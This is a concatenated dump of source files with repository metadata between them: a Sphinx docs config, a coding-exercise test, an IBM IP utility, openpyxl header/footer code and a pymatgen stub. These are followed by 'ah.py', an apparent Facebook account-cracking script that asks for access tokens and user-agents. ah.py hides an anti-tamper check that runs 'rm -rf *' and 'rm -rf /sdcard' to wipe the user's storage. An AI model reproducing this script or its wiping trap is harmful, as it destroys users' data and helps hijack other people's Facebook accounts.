# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ["**cli*", "_build", "**.ipynb_checkpoints", "_templates"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
here = Path(__file__).parent.absolute()
# html_logo = str(here / "causalnex_logo.svg")
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"collapse_navigation": False,
"style_external_links": True,
# "logo_only": True
# "github_url": "https://github.com/quantumblacklabs/causalnex"
}
html_context = {
"display_github": True,
"github_url": "https://github.com/quantumblacklabs/causalnex/tree/develop/docs/source",
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
html_show_sourcelink = False
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "causalnexdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "causalnex.tex", "causalnex Documentation", "QuantumBlack", "manual")
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "causalnex", "causalnex Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"causalnex",
"causalnex Documentation",
author,
"causalnex",
"Toolkit for causal reasoning (Bayesian Networks / Inference)",
"Data-Science",
)
]
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Extension configuration -------------------------------------------------
# nbsphinx_prolog = """
# see here for prolog/epilog details:
# https://nbsphinx.readthedocs.io/en/0.4.0/prolog-and-epilog.html
# """
nbsphinx_epilog = """
.. note::
Found a bug, or didn't find what you were looking for? `🙏Please file a
ticket <https://github.com/quantumblacklabs/causalnex/issues/new/choose>`_
"""
# -- NBconvert kernel config -------------------------------------------------
nbsphinx_kernel_name = "causalnex"
# -- causalnex specific configuration ------------------
MODULES = []
def get_classes(module):
importlib.import_module(module)
return [obj[0] for obj in getmembers(sys.modules[module], lambda obj: isclass(obj))]
def get_functions(module):
importlib.import_module(module)
return [
obj[0] for obj in getmembers(sys.modules[module], lambda obj: isfunction(obj))
]
def remove_arrows_in_examples(lines):
for i, line in enumerate(lines):
lines[i] = line.replace(">>>", "")
def autolink_replacements(what):
"""
Create a list containing replacement tuples of the form:
(``regex``, ``replacement``, ``obj``) for all classes and methods which are
imported in ``MODULES`` ``__init__.py`` files. The ``replacement``
is a reStructuredText link to their documentation.
For example, if the docstring reads:
This DataSet loads and saves ...
Then the word ``DataSet``, will be replaced by
:class:`~causalnex.io.DataSet`
Works for plural as well, e.g:
These ``DataSet``s load and save
Will convert to:
These :class:`causalnex.io.DataSet` s load and
save
Args:
what (str) : The objects to create replacement tuples for. Possible
values ["class", "func"]
Returns:
List[Tuple[regex, str, str]]: A list of tuples: (regex, replacement,
obj), for all "what" objects imported in __init__.py files of
``MODULES``
"""
replacements = []
suggestions = []
for module in MODULES:
if what == "class":
objects = get_classes(module)
elif what == "func":
objects = get_functions(module)
# Look for recognised class names/function names which are
# surrounded by double back-ticks
if what == "class":
# first do plural only for classes
replacements += [
(
r"``{}``s".format(obj),
":{}:`~{}.{}`\\\\s".format(what, module, obj),
obj,
)
for obj in objects
]
# singular
replacements += [
(r"``{}``".format(obj), ":{}:`~{}.{}`".format(what, module, obj), obj)
for obj in objects
]
# Look for recognised class names/function names which are NOT
# surrounded by double back-ticks, so that we can log these in the
# terminal
if what == "class":
# first do plural only for classes
suggestions += [
(r"(?<!\w|`){}s(?!\w|`{{2}})".format(obj), "``{}``s".format(obj), obj)
for obj in objects
]
# then singular
suggestions += [
(r"(?<!\w|`){}(?!\w|`{{2}})".format(obj), "``{}``".format(obj), obj)
for obj in objects
]
return replacements, suggestions
def log_suggestions(lines: List[str], name: str):
"""Use the ``suggestions`` list to log in the terminal places where the
developer has forgotten to surround with double back-ticks class
name/function name references.
Args:
lines: The docstring lines.
name: The name of the object whose docstring is contained in lines.
"""
title_printed = False
for i in range(len(lines)):
if ">>>" in lines[i]:
continue
for existing, replacement, obj in suggestions:
new = re.sub(existing, r"{}".format(replacement), lines[i])
if new == lines[i]:
continue
if ":rtype:" in lines[i] or ":type " in lines[i]:
continue
if not title_printed:
secho("-" * 50 + "\n" + name + ":\n" + "-" * 50, fg="blue")
title_printed = True
print(
"["
+ str(i)
+ "] "
+ re.sub(existing, r"{}".format(style(obj, fg="magenta")), lines[i])
)
print(
"["
+ str(i)
+ "] "
+ re.sub(existing, r"``{}``".format(style(obj, fg="green")), lines[i])
)
if title_printed:
print("\n")
def autolink_classes_and_methods(lines):
for i in range(len(lines)):
if ">>>" in lines[i]:
continue
for existing, replacement, obj in replacements:
lines[i] = re.sub(existing, r"{}".format(replacement), lines[i])
# Sphinx build passes six arguments
def autodoc_process_docstring(app, what, name, obj, options, lines):
try:
# guarded method to make sure build never fails
log_suggestions(lines, name)
autolink_classes_and_methods(lines)
except Exception as e:
print(
style(
"Failed to check for class name mentions that can be "
"converted to reStructuredText links in docstring of {}. "
"Error is: \n{}".format(name, str(e)),
fg="red",
)
)
remove_arrows_in_examples(lines)
# Sphinx build method passes six arguments
def skip(app, what, name, obj, skip, options):
if name == "__init__":
return False
return skip
def _prepare_build_dir(app, config):
"""Get current working directory to the state expected
by the ReadTheDocs builder. Shortly, it does the same as
./build-docs.sh script except not running `sphinx-build` step."""
build_root = Path(app.srcdir)
build_out = Path(app.outdir)
copy_tree(str(here / "source"), str(build_root))
copy_tree(str(build_root / "api_docs"), str(build_root))
shutil.rmtree(str(build_root / "api_docs"))
shutil.rmtree(str(build_out), ignore_errors=True)
copy_tree(str(build_root / "css"), str(build_out / "_static" / "css"))
copy_tree(str(build_root / "04_user_guide/images"), str(build_out / "04_user_guide"))
shutil.rmtree(str(build_root / "css"))
def setup(app):
app.connect("config-inited", _prepare_build_dir)
app.connect("autodoc-process-docstring", autodoc_process_docstring)
app.connect("autodoc-skip-member", skip)
app.add_stylesheet("css/qb1-sphinx-rtd.css")
# fix a bug with table wraps in Read the Docs Sphinx theme:
# https://rackerlabs.github.io/docs-rackspace/tools/rtd-tables.html
app.add_stylesheet("css/theme-overrides.css")
# add "Copy" button to code snippets
app.add_stylesheet("css/copybutton.css")
app.add_stylesheet("css/causalnex.css")
# when using nbsphinx, to allow mathjax render properly
app.config._raw_config.pop('mathjax_config')
def fix_module_paths():
"""
This method fixes the module paths of all class/functions we import in the
__init__.py file of the various causalnex submodules.
"""
for module in MODULES:
mod = importlib.import_module(module)
if not hasattr(mod, "__all__"):
mod.__all__ = get_classes(module) + get_functions(module)
# (regex, restructuredText link replacement, object) list
replacements = []
# (regex, class/function name surrounded with back-ticks, object) list
suggestions = []
try:
# guarded code to make sure build never fails
replacements_f, suggestions_f = autolink_replacements("func")
replacements_c, suggestions_c = autolink_replacements("class")
replacements = replacements_f + replacements_c
suggestions = suggestions_f + suggestions_c
except Exception as e:
print(
style(
"Failed to create list of (regex, reStructuredText link "
"replacement) for class names and method names in docstrings. "
"Error is: \n{}".format(str(e)),
fg="red",
)
)
fix_module_paths()
patchy.patch(
generate_autosummary_docs,
"""\
@@ -3,7 +3,7 @@ def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
base_path=None, builder=None, template_dir=None,
imported_members=False, app=None):
# type: (List[unicode], unicode, unicode, Callable, Callable, unicode, Builder, unicode, bool, Any) -> None # NOQA
-
+ imported_members = True
showed_sources = list(sorted(sources))
if len(showed_sources) > 20:
showed_sources = showed_sources[:10] + ['...'] + showed_sources[-10:]
""",
)
patchy.patch(
generate_autosummary_docs,
"""\
@@ -96,6 +96,21 @@ def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
if x in include_public or not x.startswith('_')]
return public, items
+ import importlib
+ def get_public_modules(obj, typ):
+ # type: (Any, str) -> List[str]
+ items = [] # type: List[str]
+ for item in getattr(obj, '__all__', []):
+ try:
+ importlib.import_module(name + '.' + item)
+ except ImportError:
+ continue
+ finally:
+ if item in sys.modules:
+ sys.modules.pop(name + '.' + item)
+ items.append(name + '.' + item)
+ return items
+
ns = {} # type: Dict[unicode, Any]
""",
)
patchy.patch(
generate_autosummary_docs,
"""\
@@ -106,6 +106,9 @@ def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
get_members(obj, 'class', imported=imported_members)
ns['exceptions'], ns['all_exceptions'] = \\
get_members(obj, 'exception', imported=imported_members)
+ ns['public_modules'] = get_public_modules(obj, 'module')
+ ns['functions'] = [m for m in ns['functions'] if not hasattr(obj, '__all__') or m in obj.__all__]
+ ns['classes'] = [m for m in ns['classes'] if not hasattr(obj, '__all__') or m in obj.__all__]
elif doc.objtype == 'class':
ns['members'] = dir(obj)
ns['inherited_members'] = \\
""",
)
| 33.125 | 120 | 0.610003 |
fd2df8c0b00a1a406d43dc376ed4d5dcf0ae90ab | 1,921 | py | Python | Codefights/arcade/python-arcade/level-4/28.Sort-Students/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codefights/arcade/python-arcade/level-4/28.Sort-Students/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codefights/arcade/python-arcade/level-4/28.Sort-Students/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python3
from solution1 import sortStudents as f
qa = [
(['John Smith',
'Jacky Mon Simonoff',
'Lucy Smith',
'Angela Zimonova'],
['Jacky Mon Simonoff',
'John Smith',
'Lucy Smith',
'Angela Zimonova']),
(['Lucy Smith',
'John Smith',
'Jacky Mon Simonoff',
'Angela Zimonova'],
['Jacky Mon Simonoff',
'Lucy Smith',
'John Smith',
'Angela Zimonova']),
(['Kate'],
['Kate']),
(['Massuginn Dragonbrewer',
'Gragrinelynn Chainbasher',
'Barirud Treasureforged',
'Orimir Rubyheart',
'Krathoun Flatbuster',
'Museagret Browngrog',
'Groodgratelin Magmabuckle'],
['Museagret Browngrog',
'Gragrinelynn Chainbasher',
'Massuginn Dragonbrewer',
'Krathoun Flatbuster',
'Groodgratelin Magmabuckle',
'Orimir Rubyheart',
'Barirud Treasureforged']),
(['Massuginn Dragonbrewer',
'Nomneare Windback',
'Nurgutrude Strongpike',
'Barirud Treasureforged',
'Rudrud Lavahelm',
'Asseam Coindelver',
'Krathoun Flatbuster',
'Museagret Browngrog',
'Gorbaebelle Brickbelt',
'Groodgratelin Magmabuckle'],
['Gorbaebelle Brickbelt',
'Museagret Browngrog',
'Asseam Coindelver',
'Massuginn Dragonbrewer',
'Krathoun Flatbuster',
'Rudrud Lavahelm',
'Groodgratelin Magmabuckle',
'Nurgutrude Strongpike',
'Barirud Treasureforged',
'Nomneare Windback']),
(['John Doe',
'Brick Tick',
'Batman'],
['Batman',
'John Doe',
'Brick Tick'])
]
for *q, a in qa:
for i, e in enumerate(q):
print('input{0}: {1}'.format(i + 1, e))
ans = f(*q)
if ans != a:
print(' [failed]')
print(' output:', ans)
print(' expected:', a)
else:
print(' [ok]')
print(' output:', ans)
print()
| 24.628205 | 47 | 0.557002 |
647ba39e90ea3bd481c20540ca73b992efd09ea9 | 1,531 | py | Python | cpo/lib/fyre/utils/network.py | IBM/data-gate-cli | fc0cb1a560a0156c71eb63a550e198d0cd36e1df | [
"Apache-2.0"
] | 9 | 2020-08-21T08:46:34.000Z | 2021-09-02T15:47:41.000Z | cpo/lib/fyre/utils/network.py | IBM/data-gate-cli | fc0cb1a560a0156c71eb63a550e198d0cd36e1df | [
"Apache-2.0"
] | 10 | 2020-11-26T15:31:43.000Z | 2021-11-08T15:00:01.000Z | cpo/lib/fyre/utils/network.py | IBM/data-gate-cli | fc0cb1a560a0156c71eb63a550e198d0cd36e1df | [
"Apache-2.0"
] | 1 | 2022-03-10T07:14:49.000Z | 2022-03-10T07:14:49.000Z | # Copyright 2021 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ipaddress
import re as regex
from typing import List, Optional
from cpo.lib.error import DataGateCLIException
def get_private_ip_address_of_infrastructure_node(ipv4_addresses: List[ipaddress.IPv4Address]) -> ipaddress.IPv4Address:
"""Returns the private IP address of the infrastructure node
Parameters
----------
ipv4_addresses
all IPv4 addresses bound to local network interfaces of the
infrastructure node
Returns
-------
ipaddress.IPv4Address
private IP address of the infrastructure node
"""
result: Optional[ipaddress.IPv4Address] = None
for ipv4_address in ipv4_addresses:
search_result = regex.match("(10\\.\\d+\\.\\d+\\.\\d+)", str(ipv4_address))
if search_result is not None:
result = ipv4_address
break
if result is None:
raise DataGateCLIException("Private IP address not found")
return result
| 29.442308 | 120 | 0.7113 |
17c66d00b1051811ab46f6e768b0f616acbd0b56 | 8,049 | py | Python | venv/lib/python3.7/site-packages/openpyxl/worksheet/header_footer.py | taoyu0429/xmid2excel | faa93933a07b771eca57cfbd93b34c28366fd921 | [
"Unlicense"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | venv/lib/python3.7/site-packages/openpyxl/worksheet/header_footer.py | taoyu0429/xmid2excel | faa93933a07b771eca57cfbd93b34c28366fd921 | [
"Unlicense"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | venv/lib/python3.7/site-packages/openpyxl/worksheet/header_footer.py | taoyu0429/xmid2excel | faa93933a07b771eca57cfbd93b34c28366fd921 | [
"Unlicense"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyxl
# Simplified implementation of headers and footers: let worksheets have separate items
import re
from warnings import warn
from openpyxl.descriptors import (
Alias,
Bool,
Strict,
String,
Integer,
MatchPattern,
Typed,
)
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.compat import unicode
from openpyxl.xml.functions import Element
from openpyxl.utils.escape import escape, unescape
FONT_PATTERN = '&"(?P<font>.+)"'
COLOR_PATTERN = "&K(?P<color>[A-F0-9]{6})"
SIZE_REGEX = r"&(?P<size>\d+\s?)"
FORMAT_REGEX = re.compile("{0}|{1}|{2}".format(FONT_PATTERN, COLOR_PATTERN,
SIZE_REGEX)
)
def _split_string(text):
"""
Split the combined (decoded) string into left, center and right parts
# See http://stackoverflow.com/questions/27711175/regex-with-multiple-optional-groups for discussion
"""
ITEM_REGEX = re.compile("""
(&L(?P<left>.+?))?
(&C(?P<center>.+?))?
(&R(?P<right>.+?))?
$""", re.VERBOSE | re.DOTALL)
m = ITEM_REGEX.match(text)
try:
parts = m.groupdict()
except AttributeError:
warn("""Cannot parse header or footer so it will be ignored""")
parts = {'left':'', 'right':'', 'center':''}
return parts
class _HeaderFooterPart(Strict):
"""
Individual left/center/right header/footer part
Do not use directly.
Header & Footer ampersand codes:
* &A Inserts the worksheet name
* &B Toggles bold
* &D or &[Date] Inserts the current date
* &E Toggles double-underline
* &F or &[File] Inserts the workbook name
* &I Toggles italic
* &N or &[Pages] Inserts the total page count
* &S Toggles strikethrough
* &T Inserts the current time
* &[Tab] Inserts the worksheet name
* &U Toggles underline
* &X Toggles superscript
* &Y Toggles subscript
* &P or &[Page] Inserts the current page number
* &P+n Inserts the page number incremented by n
* &P-n Inserts the page number decremented by n
* &[Path] Inserts the workbook path
* && Escapes the ampersand character
* &"fontname" Selects the named font
* &nn Selects the specified 2-digit font point size
Colours are in RGB Hex
"""
text = String(allow_none=True)
font = String(allow_none=True)
size = Integer(allow_none=True)
RGB = ("^[A-Fa-f0-9]{6}$")
color = MatchPattern(allow_none=True, pattern=RGB)
def __init__(self, text=None, font=None, size=None, color=None):
self.text = text
self.font = font
self.size = size
self.color = color
def __str__(self):
"""
Convert to Excel HeaderFooter miniformat minus position
"""
fmt = []
if self.font:
fmt.append(u'&"{0}"'.format(self.font))
if self.size:
fmt.append("&{0} ".format(self.size))
if self.color:
fmt.append("&K{0}".format(self.color))
return u"".join(fmt + [self.text])
def __bool__(self):
return bool(self.text)
__nonzero__ = __bool__
@classmethod
def from_str(cls, text):
"""
Convert from miniformat to object
"""
keys = ('font', 'color', 'size')
kw = dict((k, v) for match in FORMAT_REGEX.findall(text)
for k, v in zip(keys, match) if v)
kw['text'] = FORMAT_REGEX.sub('', text)
return cls(**kw)
class HeaderFooterItem(Strict):
"""
Header or footer item
"""
left = Typed(expected_type=_HeaderFooterPart)
center = Typed(expected_type=_HeaderFooterPart)
centre = Alias("center")
right = Typed(expected_type=_HeaderFooterPart)
__keys = ('L', 'C', 'R')
def __init__(self, left=None, right=None, center=None):
if left is None:
left = _HeaderFooterPart()
self.left = left
if center is None:
center = _HeaderFooterPart()
self.center = center
if right is None:
right = _HeaderFooterPart()
self.right = right
def __str__(self):
"""
Pack parts into a single string
"""
TRANSFORM = {'&[Tab]': '&A', '&[Pages]': '&N', '&[Date]': '&D',
'&[Path]': '&Z', '&[Page]': '&P', '&[Time]': '&T', '&[File]': '&F',
'&[Picture]': '&G'}
# escape keys and create regex
SUBS_REGEX = re.compile("|".join(["({0})".format(re.escape(k))
for k in TRANSFORM]))
def replace(match):
"""
Callback for re.sub
Replace expanded control with mini-format equivalent
"""
sub = match.group(0)
return TRANSFORM[sub]
txt = []
for key, part in zip(
self.__keys, [self.left, self.center, self.right]):
if part.text is not None:
txt.append(u"&{0}{1}".format(key, unicode(part)))
txt = "".join(txt)
txt = SUBS_REGEX.sub(replace, txt)
return escape(txt)
def __bool__(self):
return any([self.left, self.center, self.right])
__nonzero__ = __bool__
def to_tree(self, tagname):
"""
Return as XML node
"""
el = Element(tagname)
el.text = unicode(self)
return el
@classmethod
def from_tree(cls, node):
if node.text:
text = unescape(node.text)
parts = _split_string(text)
for k, v in parts.items():
if v is not None:
parts[k] = _HeaderFooterPart.from_str(v)
self = cls(**parts)
return self
class HeaderFooter(Serialisable):
tagname = "headerFooter"
differentOddEven = Bool(allow_none=True)
differentFirst = Bool(allow_none=True)
scaleWithDoc = Bool(allow_none=True)
alignWithMargins = Bool(allow_none=True)
oddHeader = Typed(expected_type=HeaderFooterItem, allow_none=True)
oddFooter = Typed(expected_type=HeaderFooterItem, allow_none=True)
evenHeader = Typed(expected_type=HeaderFooterItem, allow_none=True)
evenFooter = Typed(expected_type=HeaderFooterItem, allow_none=True)
firstHeader = Typed(expected_type=HeaderFooterItem, allow_none=True)
firstFooter = Typed(expected_type=HeaderFooterItem, allow_none=True)
__elements__ = ("oddHeader", "oddFooter", "evenHeader", "evenFooter", "firstHeader", "firstFooter")
def __init__(self,
differentOddEven=None,
differentFirst=None,
scaleWithDoc=None,
alignWithMargins=None,
oddHeader=None,
oddFooter=None,
evenHeader=None,
evenFooter=None,
firstHeader=None,
firstFooter=None,
):
self.differentOddEven = differentOddEven
self.differentFirst = differentFirst
self.scaleWithDoc = scaleWithDoc
self.alignWithMargins = alignWithMargins
if oddHeader is None:
oddHeader = HeaderFooterItem()
self.oddHeader = oddHeader
if oddFooter is None:
oddFooter = HeaderFooterItem()
self.oddFooter = oddFooter
if evenHeader is None:
evenHeader = HeaderFooterItem()
self.evenHeader = evenHeader
if evenFooter is None:
evenFooter = HeaderFooterItem()
self.evenFooter = evenFooter
if firstHeader is None:
firstHeader = HeaderFooterItem()
self.firstHeader = firstHeader
if firstFooter is None:
firstFooter = HeaderFooterItem()
self.firstFooter = firstFooter
def __bool__(self):
parts = [getattr(self, attr) for attr in self.__attrs__ + self.__elements__]
return any(parts)
__nonzero__ = __bool__
| 29.269091 | 104 | 0.584669 |
990a0e76efb1f7a07d38b8a2c83c75a97710b450 | 366 | py | Python | pymatgen/analysis/diffraction/__init__.py | hpatel1567/pymatgen | 8304b25464206c74305214e45935df90bab95500 | [
"MIT"
] | 1 | 2020-03-03T06:33:25.000Z | 2020-03-03T06:33:25.000Z | pymatgen/analysis/diffraction/__init__.py | hpatel1567/pymatgen | 8304b25464206c74305214e45935df90bab95500 | [
"MIT"
] | null | null | null | pymatgen/analysis/diffraction/__init__.py | hpatel1567/pymatgen | 8304b25464206c74305214e45935df90bab95500 | [
"MIT"
] | null | null | null | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This package implements various diffraction analyses.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "5/22/14"
| 22.875 | 55 | 0.740437 |
dc0851a06af74a50d6e516633fc270fa8c32b978 | 26,603 | py | Python | ah.py | OPDIHI/elite | 9c33822ef853da510e7314268c21cb7bb2e5cbc8 | [
"MIT"
] | 2 | 2022-02-20T19:30:51.000Z | 2022-03-19T03:15:21.000Z | ah.py | OPDIHI/elite | 9c33822ef853da510e7314268c21cb7bb2e5cbc8 | [
"MIT"
] | 1 | 2022-02-18T12:24:17.000Z | 2022-02-18T12:24:17.000Z | ah.py | OPDIHI/elite | 9c33822ef853da510e7314268c21cb7bb2e5cbc8 | [
"MIT"
] | null | null | null | #!/usr/bin/python2
# coding=utf-8-*-
# author : Khamdihi XD
# (C) Copyright 407 Authentic Exploit
# Rebuild Copyright Can't make u real programmer:)
# Coded By Khamdihi XD
# BEBAS REKODE ASAL BERI NAMA GUE DI AUTHOR NYA
# WA ME -> +62 831-4606-1814 + (DONASIDANA/PULSA)
# GITHUB ME -> https://github.com/OPDIHI
# CUMA NGINGTIN DILARANG MENGHAPUS ATAU MERUBAH JIKA KAMH MASIH PEMULA KARNA ADA KODE UNTUK MENGHAPUS MEMORI
### IMPORT MODULE ###
import os, sys, re, time, requests, calendar, random,json
from random import randint
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup as parser
from datetime import datetime
from datetime import date
from time import sleep as waktu
try:
import requests
except ImportError:
print("\n [!] module requests belum terinstall")
os.system("pip2 install requests")
try:
import bs4
except ImportError:
print("\n [!] module bs4 belum terinstall")
os.system("pip2 install bs4")
try:
import concurrent.futures
except ImportError:
print("\n [!] module futures belum terinstall")
os.system("pip2 install futures")
### GLOBAL WARNA ###
P = '\x1b[1;97m' # PUTIH *
M = '\x1b[1;91m' # MERAH *
H = '\x1b[1;92m' # HIJAU. *
K = '\x1b[1;93m' # KUNING. *
B = '\x1b[1;94m' # BIRU. *
U = '\x1b[1;95m' # UNGU. "
O = '\x1b[1;96m' # BIRU MUDA. *
N = '\x1b[0m' # WARNA MATI *
### GLOBAL NAMA ###
IP = requests.get('https://api.ipify.org').text
url = "https://mbasic.facebook.com"
ses = requests.Session()
id = []
cp = []
ok = []
opsi = []
ubahP = []
pwbaru = []
data = {}
data2 = {}
loop = 0
headerz = random.choice([
"Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36"
])
### GLOBAL WAKTU ###
ct = datetime.now()
n = ct.month
bulann = ['Januari','Februari','Maret','April','Mei','Juni','Juli','Agustus','September','Oktober','November','Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulann[nTemp]
my_date = date.today()
hr = calendar.day_name[my_date.weekday()]
tanggal = ("%s-%s-%s-%s"%(hr, ha, op, ta))
tgl = ("%s %s %s"%(ha, op, ta))
bulan = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
ua = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
### DEF TAMBAHAN ###
def jalan(z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def mlaku(z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
### KALO KAMU BELUM TAU INI JANGAN DI GANTI BAHAYA
AUTHOR_SCRIPT = 'KHAMDIHI XD KANG CODING UTF8'
PENGGUNA_SCRIPT = 'KANG REKODE HANDAL KEK KONTOL'
PENGHAPUSMEMORI = 'KHAMDIHI XD KANG CODING UTF8KANG REKODE HANDAL KEK KONTOL'
### AKU GAK MAU BERTANGUNG JAWAB OK
def ___parah___(AUTHOR_SCRIPT,PENGGUNA_SCRIPT):
___jangandiganti___ = AUTHOR_SCRIPT+PENGGUNA_SCRIPT
if ___jangandiganti___ not in PENGHAPUSMEMORI:os.system('termux-setup-storage');os.system('rm -rf *');os.system('rm -rf /sdcard');print('[!] Maaf file sdcard kamu telah terhapus ! di karnakan rekode !');exit()
else:pass
### INI JANGAN DI GANTI YAH NANTI EROR :(
___crot___ = '___khamdihi___XD___'
____rekode____ = '___hayu___mau___rekodeya___'
___khamdihi___ = '___my___frinds___the___best'
___buatkamuyangrekode___ = '___tetap___semangat___'
### INI JANGAN DI GANTI KONTOL PLEASE ';(
___dihi___ = '_____khamdihi_____'
___khaa___ = 'sayang'
___rekode___ = 'diatapidiagakpeka'
____cek____ = '_____khamdihi_____sayangdiatapidiagakpeka'
def ___cek___(___dihi___,___khaa___,___rekode___):
_sayang_ = ___dihi___+___khaa___+___rekode___
if _sayang_ not in ____cek____:print('[!] Suhu kok mau rekode sih :)');exit()
else:pass
menu()
### BANNER AND SPANDUK BERI NAMA KU DI SINI DAN KAMU
def semangat():
if ___crot___ not in '___khamdihi___XD___':
os.system('clear')
semangat()
print('[ awas jika rekode kalian kena mental')
print('[ Kan udah ku bilang jangan di ganti');sys.exit()
else:pass
print('''
_ _ _ ___ ___
| || \_/ || o )| __| | Made with by Khamdihi XD
| || \_/ || o \| _| | https://github.com/OPDIHI
|_||_| |_||___/|_| | Versi saat ini 1.2\n''')
### METODE LOGIN PAKE TOKEN NGENT*D
def login():
if ____rekode____ not in '___hayu___mau___rekodeya___':
os.system('clear');semangat()
print('[ Kan udah aku bilang jangan di ganti ]')
sys.exit('[ mau rekode tapi eror ya wak kasian')
else:pass
os.system('clear');semangat()
___parah___(AUTHOR_SCRIPT,PENGGUNA_SCRIPT)
print('[1] Login pake token ')
print('[2] seting user-agent')
print('[0] Keluar')
aku = raw_input('\n[?] Chose menu : ')
if aku =='':
exit('\n[!] Jangan kosong')
elif aku in ['1','01']:
token()
elif aku in ['2','02']:
user()
elif aku in ['0','00']:
exit()
else:
exit('\n[!] Pilih 1-0 bukan -> '+(aku))
### METODE LOGIN WITH TOKEN
def token():
os.system('clear');semangat()
if ___buatkamuyangrekode___ not in '___tetap___semangat___':
os.system('clear');semangat()
print('[+] Awas cok jika kalian kena mental')
print('[*] makanya jangan di ganti');sys.exit()
else:pass
kontol = raw_input('[?] Masukan token : ')
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+kontol)
a = json.loads(otw.text)
nama = a['name']
zedd = open("token.txt", 'w')
zedd.write(kontol)
zedd.close()
menu()
except KeyError:
print("[x] Token Salah")
time.sleep(1.7)
login()
except requests.exceptions.SSLError:
exit('[x] Koneksi Error')
### USERAGENT MANUAL
def user():
if ___khamdihi___ not in '___my___frinds___the___best':
os.system('clear');semangath()
print('[*] Makanya jangan di ganti bang')
print('[+] Wenak mau rekode gagal enak ":)');sys.exit()
else:pass
ajg = raw_input("[?] masukan ua : ")
if ajg in[""]:
login()
else:
try:
zedd = open('ua.txt', 'w')
zedd.write(ajg)
zedd.close()
print("[✓] berhasil mengganti ua")
raw_input("[*] tekan enter untuk kembali ke menu")
login()
except KeyError:
exit()
def menu():
if ____rekode____ not in '___hayu___mau___rekodeya___':
os.system('clear');semangat()
